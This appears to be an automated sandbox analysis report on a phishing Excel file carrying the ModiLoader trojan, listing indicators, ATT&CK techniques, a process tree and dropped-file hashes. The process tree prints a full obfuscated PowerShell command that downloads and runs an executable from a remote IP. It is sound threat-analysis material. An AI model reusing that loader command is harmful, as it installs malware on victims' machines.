modiloader | 379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e

Analysis

max time kernel
118s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
18/12/2024, 12:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Order_948575494759.xls
Size

1.1MB
MD5

6bcc53dc843155e886f469778b4216f1
SHA1

ca277194f41d84c108389a788d7281e7566ed9f0
SHA256

379fe2ae5a34b2349fe492b4318c589416c5cc8f1e54eb1502455863da17395e
SHA512

cd6da13c89795461e4b804be52500b9db81887d18cadb0dd431cc49850db189f4e6dbb9731810d3ae55c7145ee46ee5fdc9e9606dfc73b08c2d9e5a9169abc28
SSDEEP

12288:y8zJmzHJEUiOIBUzMTSSD3DERnLRmF8DhEPpxpsAQx1Zj+jLEPHbrpW8osAz85qW:MBanbARM8At8Z+j6RsSIUAI

Score

10^/10

modiloader defense_evasion discovery execution phishing trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 58 IoCs

resource	yara_rule
behavioral1/memory/2828-117-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-128-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-131-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-135-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-139-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-143-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-146-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-122-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-150-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-154-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-157-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-161-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-164-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-169-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-173-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-175-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-179-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-182-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-186-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-189-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-193-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-119-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-197-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-120-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-129-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-121-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-137-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-147-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-158-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-123-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-124-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-125-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-126-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-133-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-166-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-165-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-163-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-162-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-160-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-159-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-156-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-155-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-153-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-152-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-151-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-149-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-148-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-145-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-144-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-142-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-141-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-140-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-138-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-136-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-134-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-132-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-130-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2
behavioral1/memory/2828-127-0x0000000003490000-0x0000000004490000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 3 IoCs

flow	pid	Process
18	2648	mshta.exe
19	2648	mshta.exe
21	2124	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
868	cmd.exe
2124	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2828	nicerose.exe

Loads dropped DLL 7 IoCs

pid	Process
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
2368	WerFault.exe
2368	WerFault.exe
2368	WerFault.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Detected phishing page
Hiding page source
phishing
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2368	2828	WerFault.exe	39

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nicerose.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2108	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2124	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2124	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2108	EXCEL.EXE
2108	EXCEL.EXE
2108	EXCEL.EXE
2108	EXCEL.EXE
2108	EXCEL.EXE
2108	EXCEL.EXE
2108	EXCEL.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2648 wrote to memory of 868	2648	mshta.exe	33
PID 2648 wrote to memory of 868	2648	mshta.exe	33
PID 2648 wrote to memory of 868	2648	mshta.exe	33
PID 2648 wrote to memory of 868	2648	mshta.exe	33
PID 868 wrote to memory of 2124	868	cmd.exe	35
PID 868 wrote to memory of 2124	868	cmd.exe	35
PID 868 wrote to memory of 2124	868	cmd.exe	35
PID 868 wrote to memory of 2124	868	cmd.exe	35
PID 2124 wrote to memory of 1056	2124	powershell.exe	36
PID 2124 wrote to memory of 1056	2124	powershell.exe	36
PID 2124 wrote to memory of 1056	2124	powershell.exe	36
PID 2124 wrote to memory of 1056	2124	powershell.exe	36
PID 1056 wrote to memory of 1156	1056	csc.exe	37
PID 1056 wrote to memory of 1156	1056	csc.exe	37
PID 1056 wrote to memory of 1156	1056	csc.exe	37
PID 1056 wrote to memory of 1156	1056	csc.exe	37
PID 2124 wrote to memory of 2828	2124	powershell.exe	39
PID 2124 wrote to memory of 2828	2124	powershell.exe	39
PID 2124 wrote to memory of 2828	2124	powershell.exe	39
PID 2124 wrote to memory of 2828	2124	powershell.exe	39
PID 2828 wrote to memory of 2368	2828	nicerose.exe	40
PID 2828 wrote to memory of 2368	2828	nicerose.exe	40
PID 2828 wrote to memory of 2368	2828	nicerose.exe	40
PID 2828 wrote to memory of 2368	2828	nicerose.exe	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Order_948575494759.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2108

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2648
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C PoWERSHeLl.Exe -EX bypAsS -noP -w 1 -c DEVICeCreDEnTIaLDePLOYmEnT.EXe ; invoke-EXPresSIon($(InvoKe-ExpressION('[sYsTeM.TEXT.EnCOdiNG]'+[CHaR]58+[cHAR]58+'Utf8.geTSTriNg([SysTEM.CONvErt]'+[chAr]0X3a+[chAR]58+'FromBaSE64StRinG('+[chAr]0x22+'JFYwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0ZYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0c0FYcFFDSkpsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnYndUS2dWdEVIZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NZHVKcUpRUWFCLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUxUUUprTXlpIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhBVHFRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFYwOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTczLjIxNC4xNjcuNzQvNDQ0L25pY2Vyb3NlLmV4ZSIsIiRlbnY6QVBQREFUQVxuaWNlcm9zZS5leGUiLDAsMCk7c1RhclQtU0xFRVAoMyk7SW5WT0tFLWVYcFJFU3NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlcm9zZS5leGUi'+[ChAR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:868
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWERSHeLl.Exe -EX bypAsS -noP -w 1 -c DEVICeCreDEnTIaLDePLOYmEnT.EXe ; invoke-EXPresSIon($(InvoKe-ExpressION('[sYsTeM.TEXT.EnCOdiNG]'+[CHaR]58+[cHAR]58+'Utf8.geTSTriNg([SysTEM.CONvErt]'+[chAr]0X3a+[chAR]58+'FromBaSE64StRinG('+[chAr]0x22+'JFYwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ0ZYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0c0FYcFFDSkpsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnYndUS2dWdEVIZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9NZHVKcUpRUWFCLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUxUUUprTXlpIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhBVHFRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFYwOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTczLjIxNC4xNjcuNzQvNDQ0L25pY2Vyb3NlLmV4ZSIsIiRlbnY6QVBQREFUQVxuaWNlcm9zZS5leGUiLDAsMCk7c1RhclQtU0xFRVAoMyk7SW5WT0tFLWVYcFJFU3NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlcm9zZS5leGUi'+[ChAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wstmlsqf.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1056
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3C4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD3C3.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1156
  - - C:\Users\Admin\AppData\Roaming\nicerose.exe
      "C:\Users\Admin\AppData\Roaming\nicerose.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2828
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 696
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
2KB

MD5
bf784edee93fca58a4f656c76f07c1b4

SHA1
4965c03faaeec20f1b0cefa4844608e403d2569c

SHA256
82e0e5014ce5a84bb7fd5e2569c66912fbf4b6262c7f0e94f9a7085ff044188f

SHA512
3c480e5ddde056f5b250f66018b78158ecb265f7843416720fbf6dd8038ec2e3d4eca5655c85659d1e7fe5d887cc93e112861beb3aa2524a1d4f9fb2725e6475

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87063374136EEC47E933C8519BBDFF7F

Filesize
471B

MD5
90c52d81ab9066022771fa4424ea7e8f

SHA1
161e7b2f33071b4f2d52dab3e273e1b9edb55b0b

SHA256
a3e87172d27129cc41d87a9f38bab1912cd2d241b1934086678e1d88602c9284

SHA512
ec0a5f3a8a846383ddf29c57355516785de9a8c3dbcfad388c22e425298ab84617e45d994fa6946d89eeb6253916d9e8ece51cefced0542f23dc727917a2ff2f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
1KB

MD5
9047d91427fbc84f6f261fa8961d626b

SHA1
a51383a0e9eccbe2032f19ff1d5c91e866cfb69f

SHA256
3181b9f6bf992319794a86f7f27631619c7fcae1e208f4ced04e64b7ea577a19

SHA512
dc21fb378f8ef75fab3c7e80bf1fb7deb2364631a939d1ed113199be83e4a18113795b57620bdbf056876515293f79e8f50b3869b7ad175e073013b0616cba85

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
488B

MD5
6e61e4f25df54c81ce8b0bf71eb10d8d

SHA1
80bb8b5033984a634012886f4542de714aea35c0

SHA256
3e4803c416f0adb0b4bdbe9c76cfd630a4ed7749dddda62f3684307d187f80cb

SHA512
f8e90df76b3f8e04e4a16e73258d8916caab7f800ce084baf0c9fcdf22c2a4a777b5ca6034c0ed8bfa4d162c1b604f5dc3599343a61cf7037edd9c3a5d896195

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87063374136EEC47E933C8519BBDFF7F

Filesize
480B

MD5
08ff2e26dfd37894053588df2db30557

SHA1
d820b0fde50806519ca4359b358051d2427e58ab

SHA256
e33dcc25873aab0262ebd6aa4260cdad6ae77af8767f4cf9e16350ab033cd60d

SHA512
a26957ba2cc782874f4b5dd89d4731418b8f12e5ba9c312876656abec6a10f247a5c3ca6d442e275e5bffa299c6846e94c776efd414177320fd451ecf559d339

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
77f79fbbe526048c799b23f93197cb8b

SHA1
782dd46b241225e478b0c9a80bda8ab754ec8e23

SHA256
346f884350a8090bbbd9caef1fba8725aa20012b38e76cf1636f6039a68643aa

SHA512
3a44435e521c380ef88dd81a6b7b676db17108e8f684461e4af4d66137561803c956ba5902c0d24176be8fd07e3ca5132f2a3d02e1714fda9e4ca1a504f32e55

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
482B

MD5
931f2719d20bf044cc8b649f76b6719b

SHA1
f822cba653ff55668687f7543164c41d0cf853a7

SHA256
473582174f486c1e0a9de861f7e46d016e7cb1948ddb66f3dd50e24ba6459c23

SHA512
8b387e0367f613d7ed01d27751f31378abe828bfb8907d0085ad8cf01becff96c7a4c224f05f20ab293e921e0982c1387f41b065d77e5ce86167053cc2f74672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns[1].hta

Filesize
8KB

MD5
ffaadbf04e0201f2413d3e81b47b50f5

SHA1
fc490f928d5e8791ccc26c4c957f3786fef50bb2

SHA256
648358dd4259ad9fc6e5f723487b6f009110cd976701032931163a74555258b0

SHA512
d726b722657bead1fe160c953a43ae7d46970e0aa8f2c405d9e72d6a853443f14d1a2512b04399d5798b39dad8332c8bdc900216aa1a1e6b656925a224b6eed7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC2E5.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD3C4.tmp

Filesize
1KB

MD5
bc916a5bc1a34d72f4827c4cf4966268

SHA1
2bba47a836ed108c273482befcda40d12a33744c

SHA256
3d57837a2900c36c5aeb87cd3f3bf3e25b2af05db71ab703c851f131c7abd53a

SHA512
e92f99a6ff7e6e5eb4febb34a947b78161d41c4325738a5ec195227364bd35e5abd17edb1a6182329c271511578c617b1985814f5001783cf3b37168e9fde6e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarC326.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\wstmlsqf.dll

Filesize
3KB

MD5
084e4ab4f1a8632e093836010a67976f

SHA1
32bc3ad6f36eb8d39fc46917018d9cc628c5f8fd

SHA256
1464d147e4fb1088723da418f787255f1565f472c47b6e7c265748ef1ad81e02

SHA512
9b81a76af3706dc7accd897feab64ba26c0895625cce5659eb23b45f1e14e7749fe1591e64e27971e9c0817d394ae105755df7f4104f592be8e56074df4dad16

Download Submit
C:\Users\Admin\AppData\Local\Temp\wstmlsqf.pdb

Filesize
7KB

MD5
0173ec725e7895d5383a5a45f7c0e535

SHA1
a7a99392132632defdd3005ba22e0adf90923047

SHA256
7759419042f9833facdac6e3eadda7f337ddb45daa99d87feb9b786030573786

SHA512
533044ffe55fa1194a9fcce88a036f4af93e13b39561dd667ff891086b3613bc29057c920230a0b98bbdb236651fafe8070d797e87dc67242093888f716fe247

Download Submit
C:\Users\Admin\AppData\Roaming\nicerose.exe

Filesize
1.3MB

MD5
ccdcd04a0ffde31366754018598eb02f

SHA1
38492826e8febf5bd7da4f9d8a8379ec7044ca9a

SHA256
63c77a3f6cfa94cbc6a4c0c1475f02520592e58d6a03e8553e77a85a3f03c32f

SHA512
